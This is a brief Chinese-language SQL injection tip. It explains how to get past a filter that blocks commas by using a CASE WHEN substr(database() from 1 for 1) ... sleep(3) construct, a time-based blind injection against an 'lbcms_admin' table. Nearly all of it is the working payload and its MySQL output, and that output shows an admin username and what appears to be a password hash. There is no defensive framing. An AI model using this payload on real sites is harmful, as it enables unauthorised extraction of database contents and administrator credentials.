sql注入過濾逗號的解決方法:
通過case when then繞過,例如:
mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 for 1) = 'l' then sleep(3) else 0 end;+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
| ID | adminName | adminPassWord | adminLov | adminConfig | adminClass | adminLock | adminDate |
+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
| 1 | admin | a797ba2993304483f0d180e25d14319a | 520 | | NULL | SgrRUQ | 2010-04-14 00:00:00 |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |
+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+
2 rows in set (3.00 sec)
